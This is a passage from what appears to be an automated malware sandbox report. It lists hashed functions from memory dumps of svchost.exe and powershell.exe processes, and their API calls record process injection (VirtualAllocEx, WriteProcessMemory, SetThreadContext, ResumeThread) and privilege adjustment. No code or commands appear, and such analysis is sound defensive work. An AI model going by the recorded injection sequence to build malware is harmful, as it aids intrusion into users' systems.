                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 1f25b513c26410ecabc14274ad12b28e0631eec719d4cad4ca804a7e6f2c71b6
                                                                                            • Instruction ID: a79d39c20ca7d5a502ab08be689a44fa9adbfb5a76425a037c4fe5dc0ea8360a
                                                                                            • Opcode Fuzzy Hash: 1f25b513c26410ecabc14274ad12b28e0631eec719d4cad4ca804a7e6f2c71b6
                                                                                            • Instruction Fuzzy Hash: 94F0FF35908740DFEB20CF05D885765FFA8EF40A21F08C0DACC094B312D27AA488CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: b5d4615209c5c8ab838ac1e32eee05a1dbe74c93de8bc37c684d3592d3ee7a3d
                                                                                            • Instruction ID: 17df07995fa4b8fdbd51fbca1b8a07af9dd2de8d58b7e842edff702f5e255c93
                                                                                            • Opcode Fuzzy Hash: b5d4615209c5c8ab838ac1e32eee05a1dbe74c93de8bc37c684d3592d3ee7a3d
                                                                                            • Instruction Fuzzy Hash: CCF0AF35504740DFEB219F45D885765FBA0EF04721F18C09ADD494B752D3B9E404CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01F4096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 01F4099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2154274030.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: fe2177303c8bffeb5ddb7460269112e02fd8b6d776608c842418a6fda32488d8
                                                                                            • Instruction ID: b6891155db843e8ce87b61f5c29edf9a57881df94459907533f9c8e6ae7a2887
                                                                                            • Opcode Fuzzy Hash: fe2177303c8bffeb5ddb7460269112e02fd8b6d776608c842418a6fda32488d8
                                                                                            • Instruction Fuzzy Hash: F5F0C239904744DFEB20DF15D8897A5FFA0EF04721F18C0DAEE4A4B716D67AE404CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01D0AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 8ea119b66c1ed5c5476fa80855c12390b7060762fcc2d3afc7e4ec8e3b3650c2
                                                                                            • Instruction ID: 6daf015f5e32a074d6992e4c63ce90da685a2799bc7c9de3f54a9b876bf4e620
                                                                                            • Opcode Fuzzy Hash: 8ea119b66c1ed5c5476fa80855c12390b7060762fcc2d3afc7e4ec8e3b3650c2
                                                                                            • Instruction Fuzzy Hash: 3FF0F631504740CFEB11DF15D985762FB90DF04621F18C0DADD494F782D2B8E544CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01D0A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 25f8b79df00db2b5e06998064c8f046909ff723ec90d65e26287c9eb825c14f2
                                                                                            • Instruction ID: ea7d997f37a210f387d901c90c9ed449f2fa4d366d24b3989979256a9b3f7085
                                                                                            • Opcode Fuzzy Hash: 25f8b79df00db2b5e06998064c8f046909ff723ec90d65e26287c9eb825c14f2
                                                                                            • Instruction Fuzzy Hash: F411A3715093809FD712CF25DC45B96FFA4DF06320F0980EBED458B293D279A848CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01D0A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153608647.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 9c1529bd17898e3f470eb6529da681e72a78db6c6e6f2cd3a48f508f872dff72
                                                                                            • Instruction ID: db8091101e7acf9244b9558af2fc7bfed7581405a533933cf44d70d2ad734d99
                                                                                            • Opcode Fuzzy Hash: 9c1529bd17898e3f470eb6529da681e72a78db6c6e6f2cd3a48f508f872dff72
                                                                                            • Instruction Fuzzy Hash: C501F275600740CFEB11DF19EC85BA6FB94DF04320F18C0ABDC098B682D279E844CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02B707F7, Relevance: .0, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2166904845.0000000002B70000.00000040.00000040.sdmp, Offset: 02B70000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d259de1c1f80785626f113975961ba5dc33da71f506bb2f0d6177e2b4996b234
                                                                                            • Instruction ID: 579c684956baef98fbf52a62dd48d83a53c7eb45455464ddc522c6654b909400
                                                                                            • Opcode Fuzzy Hash: d259de1c1f80785626f113975961ba5dc33da71f506bb2f0d6177e2b4996b234
                                                                                            • Instruction Fuzzy Hash: 0501D6755097809FC7118B15AC40893FFB8EF8763070980ABEC898B212D129A909CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02A20861, Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2166606681.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d01d93b2e74aa7a82a5bed928aae98e24bec349330b9379d31ba0864b53877af
                                                                                            • Instruction ID: de9a96caef4bc9d6e21c5a41081ed9d4ef2dd3bbe4d5790a5b626a7a9c28e62c
                                                                                            • Opcode Fuzzy Hash: d01d93b2e74aa7a82a5bed928aae98e24bec349330b9379d31ba0864b53877af
                                                                                            • Instruction Fuzzy Hash: 60E0ED5124E7D01FC31752286C6A996BF769E8321070E41EBD081CF5A7DA584C4593A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02B7081E, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2166904845.0000000002B70000.00000040.00000040.sdmp, Offset: 02B70000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9ce619e1c18240996a85ec5926aafa51edce3b97dcef9e52c3b0245888f25360
                                                                                            • Instruction ID: e0802604864353967212b7ab44085ec591dc5d5ec7c0f5b1ebdc2e58eb5ba1fe
                                                                                            • Opcode Fuzzy Hash: 9ce619e1c18240996a85ec5926aafa51edce3b97dcef9e52c3b0245888f25360
                                                                                            • Instruction Fuzzy Hash: 74E012766057049BDB50DF0AFC41852F798EB84A30B58C47FDC0D8B711E579B505CAA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D023F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153562127.0000000001D02000.00000040.00000001.sdmp, Offset: 01D02000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 312acb63799ea7d46ef8686c54dbad9c7960031b086be9f7d1070e0046406a49
                                                                                            • Instruction ID: cb7b82b6485ba066fea94e4e304361e55e95c853ea08c874d206cf56f0103c0e
                                                                                            • Opcode Fuzzy Hash: 312acb63799ea7d46ef8686c54dbad9c7960031b086be9f7d1070e0046406a49
                                                                                            • Instruction Fuzzy Hash: 6CD05E79206A818FE7178A1CC1A9B953BA4AF69B04F4744F9E840CB6A3C768E581D200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D023BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2153562127.0000000001D02000.00000040.00000001.sdmp, Offset: 01D02000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 11c7749fea046450e99cd3c37502e8e8ee3b2778dbcb0bb9ac7b045b0b673433
                                                                                            • Instruction ID: c4909107b4481ad85e9de3fad9675044024ddf25576ed82ac3a5ea0d7b6f4677
                                                                                            • Opcode Fuzzy Hash: 11c7749fea046450e99cd3c37502e8e8ee3b2778dbcb0bb9ac7b045b0b673433
                                                                                            • Instruction Fuzzy Hash: AFD05E343016818FEB16CA1CD198F5977E8AF44700F0644ECBC008B6A6C3B5E880C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: svchost.exe PID: 2420 Parent PID: 1388 svchost.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 00543B30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00543BB6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID: IV
                                                                                            • API String ID: 983334009-3798602354
                                                                                            • Opcode ID: 4ab90c7db885f3efdda8ee35d26a95ad5027735099e9957f29da91a341acaffd
                                                                                            • Instruction ID: 445d73c471cb6c3fbfb266ef59adf023ab7abbaebf8df1691e33870882f84515
                                                                                            • Opcode Fuzzy Hash: 4ab90c7db885f3efdda8ee35d26a95ad5027735099e9957f29da91a341acaffd
                                                                                            • Instruction Fuzzy Hash: 4B212871D042099FDB10CFA9C4847EEBBF5EF48314F64882ED859A7250D7789A44CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00541888, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 005418A8
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 005418BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: c231e735714ccaa4b5e789d648ab86897520c19931b16979dfd02574a015502c
                                                                                            • Instruction ID: 97b3b7d5a9e165c9b9474646f1a8367981a2a4f6063e6c9516ca4edb3092b366
                                                                                            • Opcode Fuzzy Hash: c231e735714ccaa4b5e789d648ab86897520c19931b16979dfd02574a015502c
                                                                                            • Instruction Fuzzy Hash: 37E01A70D002088F8748EFB8E96D56A7BF0FB48708B2059A9C809D3348E7305941CFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00544B58, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00544D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: cb6c88316f79ca142cf6fac89e01d5f79003190ed6a14c5725562aae5ef3a93c
                                                                                            • Instruction ID: 657c3a30473571d1f80a3c7e3e8bd45d2f11e2a414dfd1cd8bd5f8a7efefe0b0
                                                                                            • Opcode Fuzzy Hash: cb6c88316f79ca142cf6fac89e01d5f79003190ed6a14c5725562aae5ef3a93c
                                                                                            • Instruction Fuzzy Hash: 2A914971D00219CFDB14CFA4C8817EEBBB2BF44318F1485A9E859A7280DB749D85CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 005442D0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00544360
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: fc4e561e9ccf3ec64c1b4fe020778743e2d8c3ecc96987c00354fe9f468b378a
                                                                                            • Instruction ID: 4afbb013f8b95d65cf964757c45765b06fdc2a53b67e0cd38f9fe518611f4744
                                                                                            • Opcode Fuzzy Hash: fc4e561e9ccf3ec64c1b4fe020778743e2d8c3ecc96987c00354fe9f468b378a
                                                                                            • Instruction Fuzzy Hash: 052127759003099FCB10CFA9C8857EEBBF5FF48314F54882AE959A7240D778A944CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 005445B9, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00544640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: a8b792245d989ef037b801f16a7425472980e2c124f17b1d8679f9f6bd27c249
                                                                                            • Instruction ID: 376e2f5474c58249692732333904662728252f25b1f78bc29d08abdbc360ef39
                                                                                            • Opcode Fuzzy Hash: a8b792245d989ef037b801f16a7425472980e2c124f17b1d8679f9f6bd27c249
                                                                                            • Instruction Fuzzy Hash: DF21F4719042599FCB10CFA9D884BEEFBF5BF48314F54882EE959A7240D7789904CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 005445C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00544640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: bd7c93e45c0ef676d14812222caaf3fb7ecbe79dfb934202f9ec1fb8863fcd35
                                                                                            • Instruction ID: 8a6c66948b401b4cdbf01d12bc78134232a82e7f13ea4b98a5de79a686e56bec
                                                                                            • Opcode Fuzzy Hash: bd7c93e45c0ef676d14812222caaf3fb7ecbe79dfb934202f9ec1fb8863fcd35
                                                                                            • Instruction Fuzzy Hash: 1621E6719002099FCB10CFA9D8447EEFBF5FF48314F55882AE959A7240D778A944CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00543B38, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00543BB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 60688c65f118f02821c75d47caa30054a18acbce7ef78ea874d42f928075413b
                                                                                            • Instruction ID: 02c5e11795f75964b4ee31049b4e5821d9df7c9459425ed9188fabfc5ecef8af
                                                                                            • Opcode Fuzzy Hash: 60688c65f118f02821c75d47caa30054a18acbce7ef78ea874d42f928075413b
                                                                                            • Instruction Fuzzy Hash: 38211871D003099FDB10CFA9C4847EEBBF5EF48318F54882AD559A7240DB78AA44CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00544010, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0054407E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 33224052a797f8ce50eddc7c190697c979f3eeb89cb83857b6d516b3168875c6
                                                                                            • Instruction ID: 34c4d127cc3e33d0bf8fa56ab48fd57b3c29ac005d8cb9a8fd44e941c93a91ff
                                                                                            • Opcode Fuzzy Hash: 33224052a797f8ce50eddc7c190697c979f3eeb89cb83857b6d516b3168875c6
                                                                                            • Instruction Fuzzy Hash: 411126719002089FCB10CFA9D8447EFBBF9AF48314F24881AE559A7250C775A950CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00545590, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 6388c70357b315a80bf26b40276489563ec9e2bbafa6261ebb2b73a3f4ec75e7
                                                                                            • Instruction ID: 5ad50dc20bcb1ec4589fddd652703a596462ebcb67b88b71a7633d5d92b53ae6
                                                                                            • Opcode Fuzzy Hash: 6388c70357b315a80bf26b40276489563ec9e2bbafa6261ebb2b73a3f4ec75e7
                                                                                            • Instruction Fuzzy Hash: D31158B1D042488FDB10CFA9C8447EFFBF5AF88218F24881AD559A7240D774A904CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00545598, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2222245568.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 0665d7ab0bccd3452d835e0ee160adace078a1bfc35d9a08455fb55b0de4de5d
                                                                                            • Instruction ID: c9847c593f7972c6cf5c219eb69c0909293b61d4e02c6b813dcdc456aa8c3d6c
                                                                                            • Opcode Fuzzy Hash: 0665d7ab0bccd3452d835e0ee160adace078a1bfc35d9a08455fb55b0de4de5d
                                                                                            • Instruction Fuzzy Hash: BB113A71D047088FDB10CFA9C4447EFFBF9AF88214F24881AD559A7240DB75A944CF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002FD01C, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2221010349.00000000002FD000.00000040.00000001.sdmp, Offset: 002FD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8561e866342d71d4ff9e5880cbe5f42d171a4e1721ae0ea4dab81b7f71de7117
                                                                                            • Instruction ID: e97c15eadd4b0cbe25a1bba4a266fbba040624c02befbc1ea8848103d2bd8b6e
                                                                                            • Opcode Fuzzy Hash: 8561e866342d71d4ff9e5880cbe5f42d171a4e1721ae0ea4dab81b7f71de7117
                                                                                            • Instruction Fuzzy Hash: 53212574614208DFCB14CF20D880B26FBA6EB84354F20C97DDA094B246CB36D817CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002FD006, Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001D.00000002.2221010349.00000000002FD000.00000040.00000001.sdmp, Offset: 002FD000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 38d3aef1a3b099744e475f09173c9bdc42edbd3382ab4215ecf04b731bf15a7e
                                                                                            • Instruction ID: 398d905fd11b6c109686987dd330865112eb2cc6b15db620ad278ccd681ab327
                                                                                            • Opcode Fuzzy Hash: 38d3aef1a3b099744e475f09173c9bdc42edbd3382ab4215ecf04b731bf15a7e
                                                                                            • Instruction Fuzzy Hash: 36218E755093848FCB02CF24D994715FF72EB46314F28C5EAD8498B6A7C33A981ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2152 Parent PID: 1888 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 01DCACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DCAD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 8248828374209aa8848cc12ac3149830fc0ff3f8fd82f89dc7c5b112faef094a
                                                                                            • Instruction ID: e8291486b6bce7897a7a463d7bb02fa6a4e1eb874f4b9820a968ef5d78baa520
                                                                                            • Opcode Fuzzy Hash: 8248828374209aa8848cc12ac3149830fc0ff3f8fd82f89dc7c5b112faef094a
                                                                                            • Instruction Fuzzy Hash: 7521D3765097849FEB138F25DC44B92FFB4EF06310F0985DAE9858B163E2319908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DCAD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 0b4168e9dac35456c516dd01f67d2a637ff5b74b4c9e198c5394f2a347fb337d
                                                                                            • Instruction ID: 6a40c9eade1ced6779bf21d914bff46c7335a12d8e170d29d3856db362523432
                                                                                            • Opcode Fuzzy Hash: 0b4168e9dac35456c516dd01f67d2a637ff5b74b4c9e198c5394f2a347fb337d
                                                                                            • Instruction Fuzzy Hash: 541191765007059FEB21CF59D884B96FBE4EF08611F04C86EDD458B612E731E414CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DCB329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 28740f85dd228153d1354278ab2b3a254b8d69b651a7b5b32f79cf6451fa417a
                                                                                            • Instruction ID: b626a259a72208c0f7f76e3cac01177b126b1f74f2c2df65729231823ff9b2d9
                                                                                            • Opcode Fuzzy Hash: 28740f85dd228153d1354278ab2b3a254b8d69b651a7b5b32f79cf6451fa417a
                                                                                            • Instruction Fuzzy Hash: 3911A371508380AFD7228F15DC45F52FFB4EF46214F09C49EED854B553C275A818DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DCB329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: d866eb1774704ca5c74d83b73786376d830cd929ba08d89b6325a027a303d758
                                                                                            • Instruction ID: da759b77378104a1d71d9e71c945beea81a67384454ddb793e1be6f2d621c054
                                                                                            • Opcode Fuzzy Hash: d866eb1774704ca5c74d83b73786376d830cd929ba08d89b6325a027a303d758
                                                                                            • Instruction Fuzzy Hash: B601AD32400700DFEB218F49DC86B62FFA0EF08B21F08C49EDD890B612C271E418DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: f275cbb6ea2493d10f724b6af219cc8d2f0a0b16a8ae2f022618a42f396a2424
                                                                                            • Instruction ID: 00d98b39be68dbf054bc02fc6e2b0d7d6d46c0090b965ba433e9e3e1825976a3
                                                                                            • Opcode Fuzzy Hash: f275cbb6ea2493d10f724b6af219cc8d2f0a0b16a8ae2f022618a42f396a2424
                                                                                            • Instruction Fuzzy Hash: 4B314A7650E3C09FEB138B759C65692BFB4AF47210F0E84DBD884CF1A3D6259809D762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 0456a923adc19fee4e20b0e709ccbd0c6fcb9859d634ea304dcbe95b03fb429a
                                                                                            • Instruction ID: cf740a5b116c05feafb938349a0b0e6890369c9530fa4db7a690454bed064b08
                                                                                            • Opcode Fuzzy Hash: 0456a923adc19fee4e20b0e709ccbd0c6fcb9859d634ea304dcbe95b03fb429a
                                                                                            • Instruction Fuzzy Hash: D0316271505380AFEB22CF65CC85F56FFF8EF05210F09859EE9858B292D375A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
